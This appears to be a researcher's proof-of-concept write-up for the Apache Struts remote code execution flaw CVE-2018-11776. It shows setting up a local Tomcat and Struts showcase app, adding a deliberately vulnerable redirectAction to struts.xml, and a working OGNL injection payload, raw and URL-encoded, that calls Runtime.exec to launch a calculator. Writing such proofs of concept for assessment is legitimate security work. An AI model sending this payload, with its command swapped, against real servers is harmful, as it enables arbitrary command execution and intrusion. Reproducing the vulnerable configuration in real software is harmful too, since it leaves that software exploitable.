Proof of Concept exploit so I could quickly assess what sorts of protections and fixes are available.
Originally found by Man Yue Mo, Semmle: https://semmle.com/news/apache-struts-CVE-2018-11776
Semmle had a "Apache Struts RCE - CVE-2018-11776 - PoC Exploit Demo" YouTube video up for a bit, but I believe it's gone or, at least, no longer linked to Semmle: https://www.youtube.com/watch?v=5SDNX20SLJ0
Took information from the above and then started looking at the commits to the struts repo: https://github.com/apache/struts/commit/6e87474f9ad0549f07dd2c37d50a9ccd0977c6e5
I'm too lazy to Docker or whatever the fuck...
sudo apt-get update
sudo apt-get upgrade
sudo apt-get dist-upgrade
sudo apt-get install default-jdk vim net-tools
mkdir ~/sources
cd ~/sources
wget http://mirrors.ocf.berkeley.edu/apache/tomcat/tomcat-7/v7.0.90/bin/apache-tomcat-7.0.90.tar.gz
tar xvzf apache-tomcat-7.0.90.tar.gz
sudo mv apache-tomcat-7.0.90 /opt/tomcat
vim ~/.bashrc
export JAVA_HOME=/usr/lib/jvm/default-java
export CATALINA_HOME=/opt/tomcat
. ~/.bashrc
sudo vim /opt/tomcat/conf/tomcat-users.xml
<user username="username" password="password" roles="manager-gui,admin-gui" />
cd ~/sources
$CATALINA_HOME/bin/shutdown.sh
$CATALINA_HOME/bin/startup.sh
http://127.0.0.1:8080/manager/html
$CATALINA_HOME/bin/shutdown.sh
$CATALINA_HOME/bin/startup.sh
http://127.0.0.1:8080/manager/html
vim /opt/tomcat/webapps/struts2-showcase-2.3.14/WEB-INF/classes/struts.xml
<action name="help">
<result type="redirectAction">
<param name="actionName">date.action</param>
</result>
</action>
date.action is already defined, so we just added another redirect action that calls date.action
By default, alwaysSelectFullNamespace should be set to True.
$CATALINA_HOME/bin/shutdown.sh
$CATALINA_HOME/bin/startup.sh
http://127.0.0.1:8080/struts2-showcase-2.3.14/showcase.jsp
%{(#_memberAccess['allowStaticMethodAccess'] = true).(#rt = @java.lang.Runtime@getRuntime()).(#rt.exec('gnome-calculator'))}
OGNL expression needs to be URL-encoded and stuck in before the last '/' in the URL, hitting our vulnerable help.action:
127.0.0.1:8080/struts2-showcase-2.3.14/<encoded-command-goes-here>/help.action
127.0.0.1:8080/struts2-showcase-2.3.14/%25%7B%28%23%5F%6D%65%6D%62%65%72%41%63%63%65%73%73%5B%27%61%6C%6C%6F%77%53%74%61%74%69%63%4D%65%74%68%6F%64%41%63%63%65%73%73%27%5D%20%3D%20%74%72%75%65%29%2E%28%23%72%74%20%3D%20%40%6A%61%76%61%2E%6C%61%6E%67%2E%52%75%6E%74%69%6D%65%40%67%65%74%52%75%6E%74%69%6D%65%28%29%29%2E%28%23%72%74%2E%65%78%65%63%28%27%67%6E%6F%6D%65%2D%63%61%6C%63%75%6C%61%74%6F%72%27%29%29%7D/help.action
Executing on the vulnerable Ubuntu host, we should see a new calc instance pop up.
https://github.com/apache/struts/commit/6e87474f9ad0549f07dd2c37d50a9ccd0977c6e5
Another extremely specific, vulnerable implementation of struts. The media coverage of this vulnerability had everyone freaking out, though only the sloppiest code/configs are really vulnerable... I can't think of an efficient, stealthy way of reliably finding this vulnerability and/or exploiting it. My recommendation: just fucking upgrade struts... (or stop using it)
